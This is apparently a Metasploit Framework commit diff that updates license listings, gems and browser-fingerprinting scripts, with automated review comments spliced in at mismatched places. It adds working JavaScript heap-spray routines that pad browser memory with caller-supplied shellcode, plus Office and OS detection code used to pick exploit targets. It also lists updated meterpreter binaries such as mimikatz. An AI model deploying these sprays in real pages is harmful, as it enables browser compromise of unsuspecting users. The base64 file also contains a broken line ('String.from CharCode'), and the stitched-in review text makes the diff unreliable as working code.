diff --git a/.mailmap b/.mailmap
index 4a85ec1c7b..7b9839f967 100644
--- a/.mailmap
+++ b/.mailmap
@@ -7,6 +7,7 @@ hmoore-r7 HD Moore jlee-r7 egypt # aka egypt jlee-r7 James Lee # aka egypt jlee-r7 James Lee +joev-r7 joev joev-r7 Joe Vennix jvazquez-r7 jvazquez-r7 limhoff-r7 Luke Imhoff
diff --git a/.rspec b/.rspec
index 16f9cdb013..0d8a01e567 100644
--- a/.rspec
+++ b/.rspec
@@ -1,2 +1,2 @@
 --color
---format documentation
+--format Fivemat
diff --git a/Gemfile b/Gemfile
index ec35b2f614..0f0282ae07 100755
--- a/Gemfile
+++ b/Gemfile
@@ -40,6 +40,8 @@ group :development, :test do
 # Version 4.1.0 or newer is needed to support generate calls without the
 # 'FactoryGirl.' in factory definitions syntax.
 gem 'factory_girl', '>= 4.1.0'
+# Make rspec output shorter and more useful
+ gem 'fivemat', '1.2.1'
 # running documentation generation tasks and rspec tasks
 gem 'rake', '>= 10.0.0'
 end
diff --git a/Gemfile.lock b/Gemfile.lock
index 23b8ceecfe..d7b1bd88e7 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -18,6 +18,7 @@ GEM
 diff-lcs (1.2.4)
 factory_girl (4.2.0)
 activesupport (>= 3.0.0)
+ fivemat (1.2.1)
 i18n (0.6.5)
 json (1.8.0)
 metasploit_data_models (0.16.6)
@@ -62,6 +63,7 @@ DEPENDENCIES
 activesupport (>= 3.0.0)
 database_cleaner
 factory_girl (>= 4.1.0)
+ fivemat (= 1.2.1)
 json
 metasploit_data_models (~> 0.16.6)
 msgpack
diff --git a/LICENSE b/LICENSE
index 237eff3bac..acb2f21eca 100644
--- a/LICENSE
+++ b/LICENSE
@@ -12,7 +12,7 @@ License: BSD-3-clause
 #
 # This license does not apply to third-party components detailed below.
 #
-# Last updated: 2013-Mar-25
+# Last updated: 2013-Nov-04
 #
 Files: data/john/*
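Review bot: In the Gemfile hunk the added comment `# Make rspec output shorter and more useful` sits at column 0, while the `gem 'fivemat', '1.2.1'` line it describes and the neighbouring entries inside the `group :development, :test do` block are indented; indent the comment to match the gem line so the block reads uniformly. The rest of the hunk is consistent with the surrounding entries.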
@@ -166,230 +166,6 @@ Files: lib/fastlib.rb
 Copyright: 2011, Rapid7 Inc.
 License: Ruby
-Files: lib/gemcache/ruby/1.9.1/arch/*/eventmachine-*/*
-Copyright: 2006-2007, Francis Cianfrocca
-License: Ruby
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/json-*/*
-Copyright: Daniel Luz
-License: Ruby
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/msgpack-*/*
-Copyright: Austin Ziegler
-License: Ruby
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/nokogiri-*/*
-Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/pg-*/*
-Copyright: 1997-2012 by the authors
-License: Ruby
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/thin-*/*
-Copyright: Marc-Andre Cournoyer
-License: Ruby
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/win32-api-*/*
-Copyright: 2003-2011, Daniel J. Berger
-License: Artistic
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/win32-service-*/*
-Copyright: 2003-2011, Daniel J. Berger
-License: Artistic
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/windows-api-*/*
-Copyright: 2007-2012, Daniel J. Berger
-License: Artistic
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/windows-pr-*/*
-Copyright: 2006-2010, Daniel J. Berger
-License: Artistic
-
-Files: lib/gemcache/ruby/1.9.1/gems/coderay-*/*
-Copyright: 2006-2011, murphy (Kornelius Kalnback)
-License: LGPL-2.1
-
-Files: lib/gemcache/ruby/1.9.1/gems/actionmailer-*/*
-Copyright: 2004-2011 David Heinemeier Hansson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/actionpack-*/*
-Copyright: 2004-2011 David Heinemeier Hansson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/activemodel-*/*
-Copyright: 2004-2011 David Heinemeier Hansson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/activerecord-*/*
-Copyright: 2004-2011 David Heinemeier Hansson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/activeresource-*/*
-Copyright: 2006-2011 David Heinemeier Hansson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/activesupport-*/*
-Copyright: 2005-2011 David Heinemeier Hansson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/acts_as_list-*/*
-Copyright: 2007 David Heinemeir Hansson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/arel-*/*
-Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/authlogic-*/*
-Copyright: 2011 Ben Johnson of Binary Logic
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/builder-*/*
-Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com)
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/carrierwave-*/*
-Copyright: 2008-2012 Jonas Nicklas
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/chunky_png-*/*
-Copyright: 2010 Willem van Bergen
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/coderay-*/*
-Copyright: Rob Aldred
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/daemons-*/*
-Copyright: 2005-2012 Thomas Uehlinger
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/diff-lcs-*/*
-Copyright: 2004-2011 Austin Ziegler
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/erubis-*/*
-Copyright: 2006-2011 kuwata-lab.com all rights reserved
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/formtastic-*/*
-Copyright: 2008-2010
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/fssm-*/*
-Copyright: 2011 Travis Tilley
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/hike-*/*
-Copyright: 2011 Sam Stephenson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/i18n-*/*
-Copyright: 2008 The Ruby I18n team
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/ice_cube-*/*
-Copyright: 2010-2012 John Crepezzi
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/journey-*/*
-Copyright: 2011 Aaron Patternson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/jquery-rails-*/*
-Copyright: 2010 Andre Arko
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/liquid-*/*
-Copyright: 2005, 2006 Tobias Luetke
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/mail-*/*
-Copyright: 2009, 2010, 2011, 2012 Mikel Lindsaar
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/metasploit_data_modules-*/*
-Copyright: 2012 Rapid7, Inc.
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/method_source-*/*
-Copyright: 2011 John Mair (banisterfiend)
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/multi_json-*/*
-Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/polyglot-*/*
-Copyright: 2007 Clifford Heath
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/prototype_legacy_helper-*/*
-Copyright: No copyright statement provided (unmaintained per https://github.com/rails/prototype_legacy_helper)
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/rack-*/*
-Copyright: 2007-2010 Christian Neukirchen
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/rack-cache-*/*
-Copyright: 2008 Ryan Tomayko
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/rack-ssl-*/*
-Copyright: 2010 Joshua Peek
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/rack-test-*/*
-Copyright: 2008-2009 Bryan Helmkamp, Engine Yard Inc.
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/railties-*/*
-Copyright: No copyright statement provided
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/rake-*/*
-Copyright: 2003, 2004 Jim Weirich
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/robots-*/*
-Copyright: 2008 Kyle Maxwell, contributors
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/slop-*/*
-Copyright: 2012 Lee Jarvis
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/spork-*/*
-Copyright: 2009 Tim Harper
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/sprockets-*/*
-Copyright: 2011 Sam Stephenson, Joshua Peek
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/state_machine-*/*
-Copyright: 2006-2012 Aaron Pfeifer
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/thor-*/*
-Copyright: 2008 Yehuda Katz
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/tilt-*/*
-Copyright: 2010 Ryan Tomayko
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/treetop-*/*
-Copyright: 2007 Nathan Sobo
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/tzinfo-*/*
-Copyright: 2005-2006 Philip Ross
-License: MIT
-
 Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
 Copyright: 2006-2010 Yoann GUILLOT
 License: LGPL-2.1
@@ -454,6 +230,127 @@ Files: modules/payloads/singles/windows/speak_pwned.rb
 Copyright: 2009-2010 Berend-Jan "SkyLined" Wever
 License: BSD-3-clause
+#
+# Gems
+#
+
+Files: activemodel
+Copyright: 2004-2011 David Heinemeier Hansson
+License: MIT
+
+Files: activerecord
+Copyright: 2004-2011 David Heinemeier Hansson
+License: MIT
+
+Files: activesupport
+Copyright: 2005-2011 David Heinemeier Hansson
+License: MIT
+
+Files: arel
+Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
+License: MIT
+
+Files: builder
+Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com)
+License: MIT
+
+Files: database_cleaner
+Copyright: 2009 Ben Mabey
+License: MIT
+
+Files: diff-lcs
+Copyright: 2004-2011 Austin Ziegler
+License: MIT
+
+Files: factory_girl
+Copyright: 2008-2013 Joe Ferris and thoughtbot, inc.
+License: MIT
+
+Files: fivemat
+Copyright: 2012 Tim Pope
+License: MIT
+
+Files: i18n
+Copyright: 2008 The Ruby I18n team
+License: MIT
+
+Files: json
+Copyright: Daniel Luz
+License: Ruby
+
+Files: metasploit_data_models
+Copyright: 2012 Rapid7, Inc.
+License: MIT
+
+Files: mini_portile
+Copyright: 2011 Luis Lavena
+License: MIT
+
+Files: msgpack
+Copyright: Austin Ziegler
+License: Ruby
+
+Files: multi_json
+Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
+License: MIT
+
+Files: network_interface
+Copyright: 2012, Rapid7, Inc.
+License: MIT
+
+Files: nokogiri
+Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada
+License: MIT
+
+Files: packetfu
+Copyright: 2008-2012 Tod Beardsley
+License: BSD-3-clause
+
+Files: pcaprub
+Copyright: 2007-2008, Alastair Houghton
+License: LGPL-2.1
+
+Files: pg
+Copyright: 1997-2012 by the authors
+License: Ruby
+
+Files: rake
+Copyright: 2003, 2004 Jim Weirich
+License: MIT
+
+Files: redcarpet
+Copyright: 2009 Natacha Porté
+License: MIT
+
+Files: robots
+Copyright: 2008 Kyle Maxwell, contributors
+License: MIT
+
+Files: rspec
+Copyright: 2009 Chad Humphries, David Chelimsky
+License: MIT
+
+Files: shoulda-matchers
+Copyright: 2006-2013, Tammer Saleh, thoughtbot, inc.
+License: MIT
+
+Files: simplecov
+Copyright: 2010-2012 Christoph Olszowka
+License: MIT
+
+Files: timecop
+Copyright: 2012 Travis Jeffery, John Trupiano
+License: MIT
+
+Files: tzinfo
+Copyright: 2005-2006 Philip Ross
+License: MIT
+
+Files: yard
+Copyright: 2007-2013 Loren Segal
+License: MIT
+
+
 License: BSD-2-clause
 Redistribution and use in source and binary forms, with or without
 modification, are permitted provided that the following conditions are met:
diff --git a/data/js/detect/addons.js b/data/js/detect/addons.js
new file mode 100644
index 0000000000..277c1fd469
--- /dev/null
+++ b/data/js/detect/addons.js
@@ -0,0 +1,51 @@
+window.addons_detect = { };
+
+/**
+ * Returns the version of Microsoft Office. If not found, returns null.
+ **/
+window.addons_detect.getMsOfficeVersion = function () {
+ var version;
+ var types = new Array();
+ for (var i=1; i <= 5; i++) {
+ try {
+ types[i-1] = typeof(new ActiveXObject("SharePoint.OpenDocuments." + i.toString()));
+ }
+ catch (e) {
+ types[i-1] = null;
+ }
+ }
+
+ if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
+ types[3] == 'object' && types[4] == 'object')
+ {
+ version = "2012";
+ }
+ else if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
+ types[3] == 'object' && types[4] == null)
+ {
+ version = "2010";
+ }
+ else if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
+ types[3] == null && types[4] == null)
+ {
+ version = "2007";
+ }
+ else if (types[0] == 'object' && types[1] == 'object' && types[2] == null &&
+ types[3] == null && types[4] == null)
+ {
+ version = "2003";
+ }
+ else if (types[0] == 'object' && types[1] == null && types[2] == null &&
+ types[3] == null && types[4] == null)
+ {
+ // If run for the first time, you must manullay allow the "Microsoft Office XP"
+ // add-on to run. However, this prompt won't show because the ActiveXObject statement
+ // is wrapped in an exception handler.
+ version = "xp";
+ }
+ else {
+ version = null;
+ }
+
+ return version;
+}
\ No newline at end of file
diff --git a/lib/rex/exploitation/javascriptosdetect.js b/data/js/detect/os.js
similarity index 98%
rename from lib/rex/exploitation/javascriptosdetect.js
rename to data/js/detect/os.js
index eabe23c33a..1fdd2deb1f 100644
--- a/lib/rex/exploitation/javascriptosdetect.js
+++ b/data/js/detect/os.js
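Review bot: The five-ProgID branch assigns `version = "2012";`, but there is no Microsoft Office 2012 release; if `SharePoint.OpenDocuments.5` is meant to identify the release that followed Office 2010 the label should presumably be `"2013"` — confirm against the ProgID-to-release mapping before changing it. The comment in the XP branch has a typo (`manullay` → `manually`). Stylistically, `var types = new Array();` is better written as `var types = [];`, and the function expression assigned to `window.addons_detect.getMsOfficeVersion` should close with `};` so the statement is terminated when this file is concatenated with others.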
@@ -52,6 +52,13 @@ window.os_detect.getVersion = function(){
 return d.style[propCamelCase] === css;
 }
+ var input_type_is_valid = function(input_type) {
+ if (!document.createElement) return false;
+ var input = document.createElement('input');
+ input.setAttribute('type', input_type);
+ return input.type == input_type;
+ }
+
+ //--
+ // Client
+ //--
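Review bot: The new `input_type_is_valid` helper compares with loose equality (`return input.type == input_type;`) while the neighbouring helper just above it uses strict equality (`return d.style[propCamelCase] === css;`); use `===` here so the two helpers follow one convention. The closing `}` of the `var input_type_is_valid = function(...)` statement also lacks its terminating `;`. The enclosing `getVersion` function starts before this hunk and continues after it.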
@@ -203,32 +210,42 @@ window.os_detect.getVersion = function(){
 // Thanks to developer.mozilla.org "Firefox for developers" series for most
 // of these.
 // Release changelogs: http://www.mozilla.org/en-US/firefox/releases/
- if ('HTMLTimeElement' in window) {
- ua_version = '22.0'
+ if (css_is_valid('background-attachment',
+ 'backgroundAttachment',
+ 'local')) {
+ ua_version = '25.0';
+ } else if ('DeviceStorage' in window && window.DeviceStorage &&
+ 'default' in window.DeviceStorage.prototype) {
+ // https://bugzilla.mozilla.org/show_bug.cgi?id=874213
+ ua_version = '24.0';
+ } else if (input_type_is_valid('range')) {
+ ua_version = '23.0';
+ } else if ('HTMLTimeElement' in window) {
+ ua_version = '22.0';
 } else if ('createElement' in document && document.createElement('main') && document.createElement('main').constructor === window['HTMLElement']) {
- ua_version = '21.0'
+ ua_version = '21.0';
 } else if ('imul' in Math) {
- ua_version = '20.0'
+ ua_version = '20.0';
 } else if (css_is_valid('font-size', 'fontSize', '23vmax')) {
- ua_version = '19.0'
+ ua_version = '19.0';
 } else if ('devicePixelRatio' in window) {
- ua_version = '18.0'
+ ua_version = '18.0';
 } else if ('createElement' in document && document.createElement('iframe') && 'sandbox' in document.createElement('iframe')) {
- ua_version = '17.0'
+ ua_version = '17.0';
 } else if ('mozApps' in navigator && 'install' in navigator.mozApps) {
- ua_version = '16.0'
+ ua_version = '16.0';
 } else if ('HTMLSourceElement' in window && HTMLSourceElement.prototype && 'media' in HTMLSourceElement.prototype) {
- ua_version = '15.0'
+ ua_version = '15.0';
 } else if ('mozRequestPointerLock' in document.body) {
- ua_version = '14.0'
+ ua_version = '14.0';
 } else if ('Map' in window) {
- ua_version = "13.0"
+ ua_version = "13.0";
 } else if ('mozConnection' in navigator) {
 ua_version = "12.0";
 } else if ('mozVibrate' in navigator) {
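Review bot: The new Firefox 24 branch evaluates `'default' in window.DeviceStorage.prototype` after checking only that `window.DeviceStorage` is truthy; if `prototype` is not an object the `in` operator throws a TypeError and the whole version chain aborts. The existing Firefox 15 branch further down guards the same pattern (`HTMLSourceElement.prototype && 'media' in HTMLSourceElement.prototype`), so for consistency add `window.DeviceStorage.prototype &&` before the `'default' in …` test. The enclosing `getVersion` function starts and ends outside this hunk.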
diff --git a/data/js/memory/heap_spray.js b/data/js/memory/heap_spray.js
new file mode 100644
index 0000000000..ca174aca80
--- /dev/null
+++ b/data/js/memory/heap_spray.js
@@ -0,0 +1,17 @@
+var memory = new Array();
+function sprayHeap(shellcode, heapSprayAddr, heapBlockSize) {
+ var index;
+ var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16);
+ var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16);
+ while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; }
+ while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; }
+
+ var retSlide = unescape("%u"+heapSprayAddr_hi + "%u"+heapSprayAddr_lo);
+ while (retSlide.length < heapBlockSize) { retSlide += retSlide; }
+ retSlide = retSlide.substring(0, heapBlockSize - shellcode.length);
+
+ var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize;
+ for (index = 0; index < heapBlockCnt; index++) {
+ memory[index] = retSlide + shellcode;
+ }
+}
\ No newline at end of file
diff --git a/data/js/memory/mstime_malloc.js b/data/js/memory/mstime_malloc.js
new file mode 100644
index 0000000000..d931db004f
--- /dev/null
+++ b/data/js/memory/mstime_malloc.js
@@ -0,0 +1,31 @@
+function mstime_malloc(oArg) {
+ var shellcode = oArg.shellcode;
+ var offset = oArg.offset;
+ var heapBlockSize = oArg.heapBlockSize;
+ var objId = oArg.objId;
+
+ if (shellcode == undefined) { throw "Missing argument: shellcode"; }
+ if (offset == undefined) { offset = 0; }
+ if (heapBlockSize == undefined) { throw "Size must be defined"; }
+
+ var buf = "";
+ for (var i=0; i < heapBlockSize/4; i++) {
+ if (i == offset) {
+ if (i == 0) { buf += shellcode; }
+ else { buf += ";" + shellcode; }
+ }
+ else {
+ buf += ";#W00TA";
+ }
+ }
+
+ var e = document.getElementById(objId);
+ if (e == null) {
+ var eleId = "W00TB"
+ var acTag = ""
+ document.body.innerHTML = document.body.innerHTML + acTag;
+ e = document.getElementById(eleId);
+ }
+ try { e.values = buf; }
+ catch (e) {}
+}
\ No newline at end of file
diff --git a/data/js/memory/property_spray.js b/data/js/memory/property_spray.js
new file mode 100644
index 0000000000..f922e60196
--- /dev/null
+++ b/data/js/memory/property_spray.js
@@ -0,0 +1,38 @@
+var sym_div_container;
+function sprayHeap( oArg ) {
+ var shellcode = oArg.shellcode;
+ var offset = oArg.offset;
+ var heapBlockSize = oArg.heapBlockSize;
+ var maxAllocs = oArg.maxAllocs;
+ var objId = oArg.objId;
+
+ if (shellcode == undefined) { throw "Missing argument: shellcode"; }
+ if (offset == undefined) { offset = 0x00; }
+ if (heapBlockSize == undefined) { heapBlockSize = 0x80000; }
+ if (maxAllocs == undefined) { maxAllocs = 0x350; }
+
+ if (offset > 0x800) { throw "Bad alignment"; }
+
+ sym_div_container = document.getElementById(objId);
+
+ if (sym_div_container == null) {
+ sym_div_container = document.createElement("div");
+ }
+
+ sym_div_container.style.cssText = "display:none";
+ var data;
+ junk = unescape("%u2020%u2020");
+ while (junk.length < offset+0x1000) junk += junk;
+
+ data = junk.substring(0,offset) + shellcode;
+ data += junk.substring(0,0x800-offset-shellcode.length);
+
+ while (data.length < heapBlockSize) data += data;
+
+ for (var i = 0; i < maxAllocs; i++)
+ {
+ var obj = document.createElement("button");
+ obj.title = data.substring(0, (heapBlockSize-2)/2);
+ sym_div_container.appendChild(obj);
+ }
+}
\ No newline at end of file
diff --git a/data/js/network/ajax_download.js b/data/js/network/ajax_download.js
new file mode 100644
index 0000000000..560d3d22ae
--- /dev/null
+++ b/data/js/network/ajax_download.js
@@ -0,0 +1,27 @@
+function ajax_download(oArg) {
+ var method = oArg.method;
+ var path = oArg.path;
+ var data = oArg.data;
+
+ if (method == undefined) { method = "GET"; }
+ if (method == path) { throw "Missing parameter 'path'"; }
+ if (data == undefined) { data = null; }
+
+ if (window.XMLHttpRequest) {
+ xmlHttp = new XMLHttpRequest();
+ }
+ else {
+ xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
+ }
+
+ if (xmlHttp.overrideMimeType) {
+ xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
+ }
+
+ xmlHttp.open(method, path, false);
+ xmlHttp.send(data);
+ if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
+ return xmlHttp.responseText;
+ }
+ return null;
+}
\ No newline at end of file
diff --git a/data/js/utils/base64.js b/data/js/utils/base64.js
new file mode 100644
index 0000000000..3cb1dfa4cb
--- /dev/null
+++ b/data/js/utils/base64.js
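Review bot: The second guard reads `if (method == path) { throw "Missing parameter 'path'"; }`, so a missing `path` is never detected unless it happens to equal the method string, and `open(method, undefined, false)` is reached instead; the intended check is `if (path == undefined) { throw "Missing parameter 'path'"; }`. `xmlHttp` is assigned in both branches without `var`, which makes it an implicit global; declare it with `var xmlHttp;` before the `if (window.XMLHttpRequest)` test. The `open(method, path, false)` call is synchronous and blocks the page until the response arrives, which is worth a comment on the function for callers.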
@@ -0,0 +1,126 @@
+// Base64 implementation stolen from http://www.webtoolkit.info/javascript-base64.html
+// variable names changed to make obfuscation easier
+var Base64 = {
+ // private property
+ _keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
+
+ // private method
+ _utf8_encode : function ( input ){
+ input = input.replace(/\r\n/g,"\\n");
+ var utftext = "";
+ var input_idx;
+
+ for (input_idx = 0; input_idx < input.length; input_idx++) {
+ var chr = input.charCodeAt(input_idx);
+ if (chr < 128) {
+ utftext += String.fromCharCode(chr);
+ }
+ else if((chr > 127) && (chr < 2048)) {
+ utftext += String.fromCharCode((chr >> 6) | 192);
+ utftext += String.fromCharCode((chr & 63) | 128);
+ } else {
+ utftext += String.fromCharCode((chr >> 12) | 224);
+ utftext += String.fromCharCode(((chr >> 6) & 63) | 128);
+ utftext += String.fromCharCode((chr & 63) | 128);
+ }
+ }
+
+ return utftext;
+ },
+
+ // public method for encoding
+ encode : function( input ) {
+ var output = "";
+ var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
+ var input_idx = 0;
+
+ input = Base64._utf8_encode(input);
+
+ while (input_idx < input.length) {
+ chr1 = input.charCodeAt( input_idx++ );
+ chr2 = input.charCodeAt( input_idx++ );
+ chr3 = input.charCodeAt( input_idx++ );
+
+ enc1 = chr1 >> 2;
+ enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
+ enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
+ enc4 = chr3 & 63;
+
+ if (isNaN(chr2)) {
+ enc3 = enc4 = 64;
+ } else if (isNaN(chr3)) {
+ enc4 = 64;
+ }
+ output = output +
+ this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) +
+ this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);
+ }
+ return output;
+ },
+ // public method for decoding
+ decode : function (input) {
+ var output = "";
+ var chr1, chr2, chr3;
+ var enc1, enc2, enc3, enc4;
+ var i = 0;
+
+ input = input.replace(/[^A-Za-z0-9\+\/\\=]/g, "");
+
+ while (i < input.length) {
+
+ enc1 = this._keyStr.indexOf(input.charAt(i++));
+ enc2 = this._keyStr.indexOf(input.charAt(i++));
+ enc3 = this._keyStr.indexOf(input.charAt(i++));
+ enc4 = this._keyStr.indexOf(input.charAt(i++));
+
+ chr1 = (enc1 << 2) | (enc2 >> 4);
+ chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
+ chr3 = ((enc3 & 3) << 6) | enc4;
+
+ output = output + String.fromCharCode(chr1);
+
+ if (enc3 != 64) {
+ output = output + String.fromCharCode(chr2);
+ }
+ if (enc4 != 64) {
+ output = output + String.fromCharCode(chr3);
+ }
+
+ }
+
+ output = Base64._utf8_decode(output);
+
+ return output;
+
+ },
+ _utf8_decode : function (utftext) {
+ var string = "";
+ var input_idx = 0;
+ var chr1 = 0;
+ var chr2 = 0;
+ var chr3 = 0;
+
+ while ( input_idx < utftext.length ) {
+
+ chr1 = utftext.charCodeAt(input_idx);
+
+ if (chr1 < 128) {
+ string += String.fromCharCode(chr1);
+ input_idx++;
+ }
+ else if((chr1 > 191) && (chr1 < 224)) {
+ chr2 = utftext.charCodeAt(input_idx+1);
+ string += String.from CharCode(((chr1 & 31) << 6) | (chr2 & 63));
+ input_idx += 2;
+ } else {
+ chr2 = utftext.charCodeAt(input_idx+1);
+ chr3 = utftext.charCodeAt(input_idx+2);
+ string += String.fromCharCode(((chr1 & 15) << 12) | ((chr2 & 63) << 6) | (chr3 & 63));
+ input_idx += 3;
+ }
+ }
+
+ return string;
+ }
+
+};
\ No newline at end of file
diff --git a/data/meterpreter/common.lib b/data/meterpreter/common.lib
new file mode 100755
index 0000000000..75b5eb755b
Binary files /dev/null and b/data/meterpreter/common.lib differ
diff --git a/data/meterpreter/elevator.x64.dll b/data/meterpreter/elevator.x64.dll
index b8ccc6f20f..5ef9208191 100755
Binary files a/data/meterpreter/elevator.x64.dll and b/data/meterpreter/elevator.x64.dll differ
diff --git a/data/meterpreter/elevator.x86.dll b/data/meterpreter/elevator.x86.dll
index 6bf61b60da..ca6d1b87d8 100755
Binary files a/data/meterpreter/elevator.x86.dll and b/data/meterpreter/elevator.x86.dll differ
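Review bot: In `_utf8_encode` the line `input = input.replace(/\r\n/g,"\\n");` replaces CRLF with a backslash followed by the letter n rather than with a newline, because `"\\n"` is an escaped backslash in a JavaScript literal; the upstream webtoolkit code uses `"\n"`, so this looks like a double-escaping artifact from embedding the script in a host-language string, and it silently corrupts any input containing CRLF. The decoder's filter `input.replace(/[^A-Za-z0-9\+\/\\=]/g, "")` shows the same symptom: the extra `\\` admits a literal backslash, which then makes `_keyStr.indexOf` return -1 and produces garbage output, whereas the original pattern is `/[^A-Za-z0-9\+\/\=]/g`. Both lines should be restored to the single-escaped forms.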
diff --git a/data/meterpreter/ext_server_espia.x64.dll b/data/meterpreter/ext_server_espia.x64.dll
index 07e648b7af..a25bcc536e 100755
Binary files a/data/meterpreter/ext_server_espia.x64.dll and b/data/meterpreter/ext_server_espia.x64.dll differ
diff --git a/data/meterpreter/ext_server_espia.x86.dll b/data/meterpreter/ext_server_espia.x86.dll
index 1355e55082..0d65719c82 100755
Binary files a/data/meterpreter/ext_server_espia.x86.dll and b/data/meterpreter/ext_server_espia.x86.dll differ
diff --git a/data/meterpreter/ext_server_incognito.x64.dll b/data/meterpreter/ext_server_incognito.x64.dll
index 0262601a99..3b2bb9c385 100755
Binary files a/data/meterpreter/ext_server_incognito.x64.dll and b/data/meterpreter/ext_server_incognito.x64.dll differ
diff --git a/data/meterpreter/ext_server_incognito.x86.dll b/data/meterpreter/ext_server_incognito.x86.dll
index 830a83fb8c..cd53e18682 100755
Binary files a/data/meterpreter/ext_server_incognito.x86.dll and b/data/meterpreter/ext_server_incognito.x86.dll differ
diff --git a/data/meterpreter/ext_server_lanattacks.x64.dll b/data/meterpreter/ext_server_lanattacks.x64.dll
index a14a65b369..c73e5d1fa2 100755
Binary files a/data/meterpreter/ext_server_lanattacks.x64.dll and b/data/meterpreter/ext_server_lanattacks.x64.dll differ
diff --git a/data/meterpreter/ext_server_lanattacks.x86.dll b/data/meterpreter/ext_server_lanattacks.x86.dll
index bb178b592e..1b4be1f050 100755
Binary files a/data/meterpreter/ext_server_lanattacks.x86.dll and b/data/meterpreter/ext_server_lanattacks.x86.dll differ
diff --git a/data/meterpreter/ext_server_mimikatz.x64.dll b/data/meterpreter/ext_server_mimikatz.x64.dll
index a62edf68dc..6a11445e30 100755
Binary files a/data/meterpreter/ext_server_mimikatz.x64.dll and b/data/meterpreter/ext_server_mimikatz.x64.dll differ
diff --git a/data/meterpreter/ext_server_mimikatz.x86.dll b/data/meterpreter/ext_server_mimikatz.x86.dll
index bca5cc3611..244113e20a 100755
